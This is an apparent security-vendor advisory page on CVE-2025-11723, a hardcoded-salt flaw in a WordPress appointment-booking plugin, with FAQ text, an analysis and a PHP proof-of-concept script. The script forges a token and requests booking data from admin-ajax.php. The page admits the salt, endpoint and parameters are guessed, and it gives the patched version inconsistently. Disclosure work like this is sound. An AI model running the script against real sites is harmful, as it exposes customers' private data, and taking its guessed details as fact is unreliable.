What is CVE-2025-11723?

CVE-2025-11723 is a medium-severity vulnerability in the Simply Schedule Appointments Booking Plugin for WordPress, affecting versions up to 1.6.9.5. It allows unauthenticated attackers to exploit a hardcoded fallback salt used in the hash function, resulting in sensitive information exposure.

How does this vulnerability work?

The vulnerability allows attackers to generate valid authentication tokens across multiple sites using a predictable hardcoded salt. By sending these tokens to specific plugin endpoints, attackers can access and modify booking data without authentication.

Who is affected by this vulnerability?

Any WordPress site using the Simply Schedule Appointments Booking Plugin version 1.6.9.5 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard to determine if they are affected.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin dashboard. Look for the Simply Schedule Appointments plugin and verify if the version is 1.6.9.5 or lower.

What should I do to fix this vulnerability?

The best course of action is to update the Simply Schedule Appointments plugin to version 1.6.9.6 or later, which addresses the vulnerability by removing the hardcoded salt and implementing site-specific random salts.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin until a secure version is available. Additionally, review your site’s security settings and monitor for any unauthorized access attempts.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability is not trivial to exploit, it poses a significant risk to the confidentiality and integrity of sensitive booking information.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can generate a valid token using the hardcoded salt and access booking data through the plugin’s AJAX endpoints. It simulates the exploitation process, highlighting the vulnerability’s mechanics.

CWE-330 refers to the ‘Use of Insufficiently Random Values’ category. This classification indicates that the vulnerability arises from the use of predictable values in security functions, which can be exploited to bypass authentication mechanisms.

What are the implications of this vulnerability?

Exploitation of CVE-2025-11723 can lead to unauthorized access to sensitive booking information, potentially causing privacy violations and data integrity issues. While it does not allow for denial of service or remote code execution, the impact on confidentiality is significant.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-11723: Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin <= 1.6.9.5 – Unauthenticated Sensitive Information Exposure (simply-schedule-appointments)

Q: What types of data can be exposed?

Successful exploitation of this vulnerability can expose sensitive booking information, including customer details, appointment times, and service types. Attackers can also modify existing bookings, which may disrupt business operations.

CVE ID CVE-2025-11723

Plugin simply-schedule-appointments

Severity Medium (CVSS 6.5)

CWE 330

Vulnerable Version 1.6.9.5

Patched Version —

Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-11723 (metadata-based):
This vulnerability is an unauthenticated sensitive information exposure in the Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin for WordPress, affecting versions up to and including 1.6.9.5. The flaw allows attackers to generate valid authentication tokens across multiple sites, enabling unauthorized access to and modification of booking data. The CVSS score of 6.5 (Medium) reflects its network-based attack vector and low attack complexity.

Atomic Edge research identifies the root cause as CWE-330: Use of Insufficiently Random Values. The plugin’s hash() function uses a hardcoded fallback salt when no custom salt is defined in the site’s wp-config.php file. This static salt creates predictable token generation. The vulnerability description confirms this mechanism, though the exact code location is inferred from the CWE classification and typical WordPress plugin patterns. The plugin likely uses these tokens for authorization in AJAX endpoints or REST API routes.

Exploitation requires an attacker to generate a valid token using the known hardcoded salt. The attacker would then send this token to plugin endpoints that handle booking data. Based on WordPress plugin conventions, the likely attack vector is the admin-ajax.php endpoint with an action parameter containing the plugin slug, such as simply_schedule_appointments_get_bookings. The attacker would include the generated token as a parameter like hash or token. A successful request would return sensitive booking information, which could then be modified via subsequent requests to update endpoints.

The remediation likely involves removing the hardcoded fallback salt and requiring a site-specific salt defined in wp-config.php. The patched version 1.6.9.6 probably implements proper random value generation using WordPress core functions like wp_hash() or wp_salt(). The fix ensures each site uses a unique, unpredictable salt for token generation, preventing cross-site token reuse.

Successful exploitation allows unauthenticated attackers to view all booking information stored by the plugin, including customer details, appointment times, and service types. Attackers can also modify existing bookings, potentially causing business disruption, data integrity issues, and privacy violations. The impact is limited to confidentiality and integrity (C:L/I:L) with no availability effect, as the vulnerability does not permit denial of service or remote code execution.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-11723 - Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin <= 1.6.9.5 - Unauthenticated Sensitive Information Exposure
<?php

/**
 * Proof of Concept for CVE-2025-11723
 * This script demonstrates token generation using the hardcoded salt
 * and attempts to access booking data via the likely AJAX endpoint.
 * Assumptions based on WordPress plugin patterns:
 * 1. The plugin uses admin-ajax.php for data retrieval
 * 2. The action parameter includes the plugin slug
 * 3. A 'hash' or 'token' parameter validates requests
 * 4. The hardcoded salt is predictable/reusable
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS

// Simulate the vulnerable hash generation with hardcoded salt
// The exact algorithm is inferred from CWE-330 and description
function generate_vulnerable_token($data) {
    // This represents the plugin's hardcoded fallback salt
    $hardcoded_salt = 'simply_schedule_appointments_fallback_salt';
    // The plugin likely combines data with salt before hashing
    $combined = $data . $hardcoded_salt;
    // Common WordPress hash function usage
    return md5($combined); // or possibly sha1, hash('sha256', ...)
}

// Generate token for current date to match likely plugin validation
$token_data = date('Y-m-d'); // Plugin may use date-based tokens
$generated_token = generate_vulnerable_token($token_data);

echo "[+] Target: $target_urln";
echo "[+] Generated token: $generated_tokenn";
echo "[+] Attempting to access booking data...nn";

// Construct the AJAX request
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = [
    'action' => 'simply_schedule_appointments_get_bookings', // Inferred action name
    'token' => $generated_token, // Inferred parameter name
    'start_date' => date('Y-m-01'), // Common booking parameter
    'end_date' => date('Y-m-t')
];

// Send request using cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response: $responsen";

// Check for successful data retrieval
if ($http_code == 200 && !empty($response)) {
    $json_response = json_decode($response, true);
    if (json_last_error() === JSON_ERROR_NONE) {
        echo "n[SUCCESS] Potentially retrieved booking data.n";
        echo "Sample data structure:n";
        print_r(array_slice($json_response, 0, 2)); // Show first 2 entries
    } else {
        echo "n[INFO] Received non-JSON response (may be HTML error).n";
    }
} else {
    echo "n[FAILURE] No data retrieved. Possible reasons:n";
    echo "- Site uses custom salt in wp-config.phpn";
    echo "- Incorrect endpoint/parameter names inferredn";
    echo "- Plugin is patched or not installedn";
}

?>

Frequently Asked Questions

What is CVE-2025-11723?
Understanding the vulnerability
CVE-2025-11723 is a medium-severity vulnerability in the Simply Schedule Appointments Booking Plugin for WordPress, affecting versions up to 1.6.9.5. It allows unauthenticated attackers to exploit a hardcoded fallback salt used in the hash function, resulting in sensitive information exposure.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to generate valid authentication tokens across multiple sites using a predictable hardcoded salt. By sending these tokens to specific plugin endpoints, attackers can access and modify booking data without authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Simply Schedule Appointments Booking Plugin version 1.6.9.5 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard to determine if they are affected.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin dashboard. Look for the Simply Schedule Appointments plugin and verify if the version is 1.6.9.5 or lower.
What should I do to fix this vulnerability?
Recommended remediation steps
The best course of action is to update the Simply Schedule Appointments plugin to version 1.6.9.6 or later, which addresses the vulnerability by removing the hardcoded salt and implementing site-specific random salts.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the plugin until a secure version is available. Additionally, review your site’s security settings and monitor for any unauthorized access attempts.
What does the CVSS score of 6.5 mean?
Understanding risk levels
A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability is not trivial to exploit, it poses a significant risk to the confidentiality and integrity of sensitive booking information.
What types of data can be exposed?
Potential information at risk
Successful exploitation of this vulnerability can expose sensitive booking information, including customer details, appointment times, and service types. Attackers can also modify existing bookings, which may disrupt business operations.
How does the proof of concept demonstrate the issue?
Explaining the PoC functionality
The proof of concept illustrates how an attacker can generate a valid token using the hardcoded salt and access booking data through the plugin’s AJAX endpoints. It simulates the exploitation process, highlighting the vulnerability’s mechanics.
What is CWE-330?
Classification of the vulnerability
CWE-330 refers to the ‘Use of Insufficiently Random Values’ category. This classification indicates that the vulnerability arises from the use of predictable values in security functions, which can be exploited to bypass authentication mechanisms.
What are the implications of this vulnerability?
Consequences of exploitation
Exploitation of CVE-2025-11723 can lead to unauthorized access to sensitive booking information, potentially causing privacy violations and data integrity issues. While it does not allow for denial of service or remote code execution, the impact on confidentiality is significant.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations